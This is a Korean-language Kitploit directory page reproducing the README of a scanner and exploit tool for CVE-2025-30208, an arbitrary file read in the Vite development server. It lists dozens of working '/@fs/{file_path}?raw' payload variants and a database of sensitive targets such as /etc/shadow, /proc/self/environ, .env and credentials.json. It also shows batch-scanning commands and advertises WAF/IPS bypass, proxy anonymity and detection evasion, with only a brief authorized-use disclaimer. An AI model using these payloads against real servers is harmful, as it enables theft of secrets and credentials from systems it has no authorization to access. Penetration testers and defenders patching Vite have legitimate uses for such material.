Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-30208 — CVE‑2025‑30208는 인기 있는 프론트엔드 빌드 도구인 Vite 개발 서버에서 발생하는 중간 심각도의 임의 파일 읽기 취약점입니다. | Kitploit
도구/GitHubGitHub/th-secforge/cve-2025-30208
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubth-secforge/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208는 인기 있는 프론트엔드 빌드 도구인 Vite 개발 서버에서 발생하는 중간 심각도의 임의 파일 읽기 취약점입니다.

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🔥 CVE-2025-30208 Vite 임의 파일 읽기 취약점 스캐너

Python License Security Status Modular

엔터프라이즈급 기능을 갖춘 CVE-2025-30208 고급 취약점 스캐너

Vite 임의 파일 읽기 취약점 탐지를 위한 전문 침투 테스트 도구

🚀 빠른 시작 • 📋 기능 • 🔧 사용법 • 📊 예제 • 🛡️ 보안


📖 개요

이것은 Vite 개발 서버에서 CVE-2025-30208 취약점을 탐지하고 악용하도록 설계된 포괄적인 취약점 스캐너입니다. 이 취약점은 Vite의 파일 시스템 엔드포인트를 통해 임의 파일 읽기 액세스를 허용하여, 민감한 설정 파일, 소스 코드 및 시스템 정보를 잠재적으로 노출시킬 수 있습니다.

🎯 이 도구가 하는 일

  • 네트워크 전체에서 취약한 Vite 인스턴스를 탐지합니다.
  • 임의 파일 읽기 취약점을 안전하게 악용합니다.
  • 민감한 파일 및 설정 데이터를 발견합니다.
  • 여러 형식(HTML, JSON, 콘솔)으로 결과를 보고합니다.
  • 스캔 세션 및 설정을 관리합니다.
  • 자동 재시도 메커니즘으로 오류를 우아하게 처리합니다.

🏗️ 모듈식 아키텍처

이 도구는 이제 더 나은 유지보수성과 확장성을 위한 모듈식 아키텍처를 갖추고 있습니다:

  • CVE-2025-30208.py - 메인 스캐너 애플리케이션
  • payloads.py - 고급 익스플로잇 페이로드 (60개 이상 변형)
  • sensitive_files.py - 포괄적인 민감 파일 데이터베이스 (200개 이상 파일)
  • html_template.py - 향상된 해커 스타일 HTML 보고 템플릿

🚀 빠른 시작

전제 조건

root@kitploit:~
pip3 install -r requirements.txt

기본 사용법

root@kitploit:~
python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 기능

🔍 핵심 취약점 탐지

  • 60개 이상의 고급 페이로드: 최대 탐지를 위한 포괄적인 익스플로잇 기술
  • 스마트 탐지: 오탐을 피하기 위한 지능형 응답 분석
  • 실시간 검증: 대상 응답의 지속적인 검증
  • 종합 테스트: 알려진 모든 취약 엔드포인트 테스트

🛡️ 향상된 보안 기능

  • 프록시 지원: 익명성을 위한 HTTP/HTTPS 프록시 설정
  • 사용자 정의 헤더: 사용자 정의 HTTP 헤더로 WAF/IPS 우회
  • 속도 제한: 탐지를 피하기 위한 설정 가능한 지연
  • 세션 관리: 스캔 세션 저장 및 복원
  • 입력 검증: 포괄적인 매개변수 검증

🔧 고급 기능

  • 일괄 스캔: 여러 대상의 멀티스레드 스캔
  • 민감 파일 검색: 200개 이상의 민감 파일 자동 검색
  • 연결성 테스트: TCP/UDP/HTTP/HTTPS 프로토콜 테스트
  • 오류 복구: 지수 백오프를 이용한 자동 재시도
  • 종합 로깅: 타임스탬프가 포함된 상세 로그

📊 보고 및 출력

  • 🎨 향상된 HTML 보고서: 애니메이션이 포함된 아름다운 해커 스타일 취약점 보고서
  • JSON 내보내기: 추가 분석을 위한 구조화된 데이터
  • 콘솔 출력: 색상 코드로 실시간 피드백
  • 로그 파일: 상세 감사 추적
  • 대화형 웹 인터페이스: 보고서 보기를 위한 내장 웹 서버

🔧 사용법 가이드

1. 기본 설정

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. 취약점 테스트

root@kitploit:~
CVE-2025-30208 > run

# 상세 출력을 위해 상세 모드 활성화
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. 일괄 스캔

root@kitploit:~
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[두 번 Enter를 눌러 종료]

4. 민감 파일 검색

root@kitploit:~
CVE-2025-30208 > scan

5. 고급 설정

root@kitploit:~
# 프록시 설정
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# 사용자 정의 헤더 설정
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# 속도 제한 설정
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. 향상된 HTML 보고

root@kitploit:~
# 아름다운 HTML 보고서 생성
CVE-2025-30208 > pull

# 보고서 보기를 위한 웹 서버 시작
CVE-2025-30208 > web

# 특정 포트에서 웹 서버 시작
CVE-2025-30208 > web 8081

# 웹 서버 중지
CVE-2025-30208 > web off

📊 명령 참조


⚙️ 설정 옵션


🎨 향상된 페이로드 시스템

이제 스캐너는 payloads.py에 구성된 60개 이상의 다양한 페이로드 변형을 사용합니다:

기본 @fs 페이로드

root@kitploit:~
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

확장된 매개변수 변형

root@kitploit:~
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Vite 특정 변형

root@kitploit:~
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug

모듈 시스템 변형

root@kitploit:~
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html

대체 엔드포인트

root@kitploit:~
/app/{file_path}?raw??
/App/{file_path}?raw??

🔍 향상된 민감 파일 검색

이제 도구는 sensitive_files.py에 구성된 200개 이상의 민감 파일을 테스트합니다:

🖥️ 시스템 파일 (Linux/Unix)

  • /etc/passwd - 사용자 계정 정보
  • /etc/shadow - 암호화된 비밀번호 데이터
  • /etc/services - 네트워크 서비스
  • /etc/hosts - 호스트 이름 매핑
  • /etc/fstab - 파일 시스템 테이블
  • /etc/ssh/sshd_config - SSH 서버 설정
  • /etc/crontab - 시스템 cron 작업
  • /etc/sudoers - Sudo 설정

📊 프로세스 정보

  • /proc/version - 커널 버전
  • /proc/cpuinfo - CPU 정보
  • /proc/meminfo - 메모리 정보
  • /proc/self/environ - 프로세스 환경
  • /proc/self/cmdline - 프로세스 명령줄
  • /proc/net/tcp - TCP 연결
  • /proc/net/udp - UDP 연결

⚙️ 애플리케이션 설정

  • .env - 환경 변수
  • .env.local - 로컬 환경
  • .env.production - 프로덕션 환경
  • config.json - 애플리케이션 설정
  • settings.json - 애플리케이션 설정
  • application.properties - Spring 설정
  • application.yml - YAML 설정
  • database.yml - 데이터베이스 설정
  • secrets.json - 비밀 관리

📦 Node.js / JavaScript 파일

  • package.json - Node.js 종속성
  • package-lock.json - 잠긴 종속성
  • yarn.lock - Yarn 잠금 파일
  • vite.config.js - Vite 설정
  • vite.config.ts - TypeScript Vite 설정
  • tsconfig.json - TypeScript 설정
  • webpack.config.js - Webpack 설정
  • next.config.js - Next.js 설정
  • nuxt.config.js - Nuxt.js 설정
  • angular.json - Angular 설정
  • vue.config.js - Vue.js 설정
  • rollup.config.js - Rollup 설정
  • eslint.config.js - ESLint 설정

🔧 Git 파일

  • .git/config - Git 설정
  • .gitignore - Git 무시 규칙
  • .gitattributes - Git 속성
  • .gitmodules - Git 서브모듈
  • .git/HEAD - 현재 브랜치
  • .git/logs/HEAD - Git 로그
  • .git/refs/heads/master - Master 브랜치
  • .git/refs/heads/main - Main 브랜치

📚 문서 파일

  • README.md - 프로젝트 문서
  • CHANGELOG.md - 변경 로그
  • LICENSE - 라이선스 정보
  • CONTRIBUTING.md - 기여 가이드라인
  • AUTHORS - 작성자 정보
  • TODO.md - 할 일 목록
  • ROADMAP.md - 개발 로드맵

🐳 Docker 파일

  • Dockerfile - Docker 설정
  • docker-compose.yml - Docker Compose
  • docker-compose.override.yml - 재정의 설정
  • .dockerignore - Docker 무시 규칙
  • docker-compose.prod.yml - 프로덕션 설정
  • docker-compose.dev.yml - 개발 설정

🌐 웹 서버 설정

  • nginx.conf - Nginx 설정
  • apache2.conf - Apache 설정
  • httpd.conf - HTTP 데몬 설정
  • .htaccess - Apache 접근 제어
  • web.config - IIS 설정
  • robots.txt - 검색 엔진 지시어
  • sitemap.xml - 사이트 구조
  • manifest.json - 웹 앱 매니페스트
  • sw.js - 서비스 워커
  • firebase.json - Firebase 설정
  • firebase.rules - Firebase 보안 규칙

🪟 Windows 파일

  • boot.ini - 부팅 설정
  • autoexec.bat - 자동 실행 스크립트
  • system.ini - 시스템 설정
  • win.ini - Windows 설정
  • Users - 사용자 디렉토리
  • Windows - 시스템 파일
  • Program Files - 애플리케이션 디렉토리

🍎 macOS 파일

  • System - 시스템 파일
  • Library - 라이브러리 파일
  • Applications - 애플리케이션 파일
  • private/etc/hosts - 호스트 파일
  • private/etc/passwd - 사용자 계정

🗄️ 데이터베이스 파일

  • database.db - SQLite 데이터베이스
  • database.sqlite - SQLite 데이터베이스
  • data.db - 데이터 데이터베이스
  • dump.sql - 데이터베이스 덤프
  • schema.sql - 데이터베이스 스키마
  • migrations - 데이터베이스 마이그레이션

📝 로그 파일

  • logs - 로그 디렉토리
  • error.log - 오류 로그
  • access.log - 접근 로그
  • app.log - 애플리케이션 로그
  • debug.log - 디버그 로그
  • combined.log - 결합 로그

💾 백업 파일

  • backup - 백업 디렉토리
  • backup.sql - 데이터베이스 백업
  • backup.zip - 압축 백업
  • dump - 데이터 덤프
  • export - 데이터 내보내기

🔒 보안 및 인증

  • auth.json - 인증 설정
  • credentials.json - 자격 증명 저장소
  • keys.json - 키 관리
  • tokens.json - 토큰 저장소
  • jwt.json - JWT 설정
  • oauth.json - OAuth 설정

🔌 API 및 서비스 파일

  • api.json - API 설정
  • swagger.json - API 문서
  • openapi.json - OpenAPI 명세
  • graphql.json - GraphQL 설정
  • schema.json - API 스키마

☁️ 클라우드 및 배포

  • cloudformation.yml - AWS CloudFormation
  • serverless.yml - Serverless 설정
  • terraform.tf - Terraform 설정
  • kubernetes.yml - Kubernetes 설정
  • k8s.yml - Kubernetes 설정

📊 모니터링 및 분석

  • analytics.json - 분석 설정
  • monitoring.json - 모니터링 설정
  • metrics.json - 메트릭 설정
  • telemetry.json - 텔레메트리 데이터

🎨 향상된 HTML 보고

이제 도구는 다음과 같은 아름다운 해커 스타일 HTML 보고서를 생성합니다:

✨ 시각적 기능

  • 매트릭스 스타일 배경 - 애니메이션 낙하 문자
  • 그라데이션 애니메이션 및 발광 효과
  • 호버 효과가 있는 대화형 요소
  • 모든 기기 반응형 디자인
  • 보안 전문가를 위한 다크 테마 최적화

📊 대화형 통계

  • 총 누출 및 노출된 바이트 실시간 카운터
  • 색상 코드 심각도 표시기
  • 각 누출에 대한 복사 기능
  • 크기와 줄 수 콘텐츠 미리보기
  • 상세 분석 확장 가능한 섹션

🔧 기술 기능

  • Google Fonts 통합 (JetBrains Mono, Orbitron)
  • CSS 애니메이션 및 전환
  • JavaScript 상호작용 향상된 UX
  • 모바일 반응형 디자인
  • 교차 브라우저 호환성

🌐 웹 서버 통합

  • 보고서 보기를 위한 내장 HTTP 서버
  • 자동 브라우저 열기
  • 포트 구성 옵션
  • 간편한 시작/중지 명령

🛡️ 오류 처리 및 복구

자동 재시도 메커니즘

  • 3회 재시도: 실패한 요청은 자동으로 재시도됩니다
  • 지수 백오프: 재시도 간 지연 증가
  • 스마트 오류 분류: 오류 유형별 다른 처리
  • 우아한 복구: 오류 후 도구 작동 지속

오류 범주

  • NetworkError: 연결, 시간 초과, 프록시 문제
  • ConfigurationError: 잘못된 설정 및 매개변수
  • ValidationError: 잘못된 입력 매개변수
  • ScannerError: 일반 스캐너 오류

검증 기능

  • 실시간 입력 검증: 모든 매개변수 사용 전 검증
  • 설정 검증: 스캔 전 완전한 검증
  • 연결성 테스트: TCP/UDP/HTTP/HTTPS 프로토콜 테스트
  • 프록시 검증: 프록시 URL 형식 검증

📁 출력 파일


📝 영향을 받는 버전

🚨 취약한 버전

root@kitploit:~
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9

✅ 영향을 받지 않는 버전

root@kitploit:~
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0

🛡️ 보안 및 윤리적 사용

⚠️ 중요한 보안 참고사항

  • 승인된 테스트만: 소유하고 있거나 명시적 허가를 받은 시스템에서만 사용하십시오
  • 책임 있는 공개: 취약점을 시스템 소유자에게 보고하십시오
  • 속도 제한: 대상에 과부하를 주지 않도록 적절한 지연을 사용하십시오
  • 프록시 사용: 필요에 따라 익명성을 위한 프록시 사용을 고려하십시오
  • 법적 준수: 현지 법률 및 규정을 준수하십시오

🔒 모범 사례

  • 테스트 전 항상 서면 허가를 받으십시오
  • 통제된 환경에서만 사용하십시오
  • 모든 테스트 활동을 문서화하십시오
  • 속도 제한과 시스템 리소스를 존중하십시오
  • 발견 사항을 책임감 있게 보고하십시오

🚀 고급 사용 예제

예제 1: 포괄적인 네트워크 스캔

root@kitploit:~
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch

예제 2: 프록시를 사용한 은밀 스캔

root@kitploit:~
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run

예제 3: 향상된 보고 워크플로우

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080

예제 4: 민감 파일 검색

root@kitploit:~
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan

🏗️ 프로젝트 구조

root@kitploit:~
CVE-2025-30208/
├── CVE-2025-30208.py          # 메인 스캐너 애플리케이션
├── payloads.py                # 고급 익스플로잇 페이로드 (60개 이상)
├── sensitive_files.py         # 민감 파일 데이터베이스 (200개 이상)
├── html_template.py           # 향상된 HTML 보고 템플릿
├── README.md                  # 이 문서
├── requirements.txt           # Python 종속성
├── logs/                      # 로그 파일 디렉토리
├── data_leak.html            # 생성된 HTML 보고서
├── data_leak.json            # 생성된 JSON 보고서
└── session.json              # 저장된 세션 설정

🤝 기여

이 도구를 개선하기 위한 기여를 환영합니다:

  1. 저장소를 포크하십시오
  2. 기능 브랜치를 생성하십시오
  3. 변경 사항을 적용하십시오
  4. 철저히 테스트하십시오
  5. 풀 리퀘스트를 제출하십시오

기여 분야

  • payloads.py의 새로운 페이로드 변형
  • sensitive_files.py의 추가 민감 파일 패턴
  • html_template.py의 향상된 HTML 템플릿
  • 개선된 오류 처리
  • 성능 최적화
  • 문서 개선

📄 라이선스

이 프로젝트는 교육 및 승인된 보안 테스트 목적으로만 라이선스가 부여됩니다.

⚠️ 법적 고지: 이 도구는 승인된 보안 테스트 및 연구 목적으로만 사용됩니다. 사용자는 시스템을 테스트하기 전에 적절한 허가를 받았는지 확인할 책임이 있습니다. 저자는 이 도구의 오용에 대해 책임을 지지 않습니다.


👨‍💻 작성자

ThemeHackers

GitHub

보안 연구원 및 침투 테스터


⭐ 이 도구가 도움이 되었다면, 별표를 눌러주세요! ⭐

보안 커뮤니티를 위해 ❤️로 제작되었습니다

도구 다운로드
명령어설명예시
set <옵션> <값>설정 옵션 지정set RHOST 192.168.1.100
show options현재 설정 표시show options
edit대화형 옵션 편집기edit
run / exploit취약점 테스트 실행run
batch여러 대상 일괄 스캔batch
scan민감 파일 검색scan
pull결과를 HTML/JSON으로 내보내기pull
web [on|off|port]HTML 보고서용 웹 서버web 8080
save세션 설정 저장save
load세션 설정 불러오기load
test대상 연결성 테스트test
validate현재 설정 검증validate
verbose상세 모드 전환verbose
proxy프록시 설정 구성proxy
headers사용자 정의 HTTP 헤더 설정headers
rate속도 제한 구성rate
log로깅 정보 표시log
help / ?도움말 표시help
exit / quit도구 종료exit
옵션설명기본값검증
RHOST대상 호스트/IP 주소-호스트명/IP 검증
RPORT대상 포트 번호-포트 범위 (1-65535)
FILEPATH테스트할 파일 경로etc/passwd경로 검증
PROXYHTTP/HTTPS 프록시 URL-URL 형식 검증
VERBOSE상세 출력 활성화false불리언 검증
RATE_LIMIT요청 간 지연 (초)0.3숫자 검증
THREADS일괄 스캔 스레드 수5정수 검증
TIMEOUT요청 시간 초과 (초)5정수 검증
CUSTOM_HEADERS사용자 정의 HTTP 헤더 (JSON){}JSON 형식 검증
  • prettier.config.js - Prettier 설정
  • jest.config.js - Jest 설정
  • babel.config.js - Babel 설정
  • tailwind.config.js - Tailwind CSS 설정
  • 파일설명형식
    data_leak.html향상된 해커 스타일 HTML 취약점 보고서HTML
    data_leak.json구조화된 JSON 내보내기JSON
    sensitive_files_discovery.json발견된 민감 파일JSON
    session.json저장된 세션 설정JSON
    logs/cve_2025_30208_YYYYMMDD_HHMMSS.log상세 감사 로그텍스트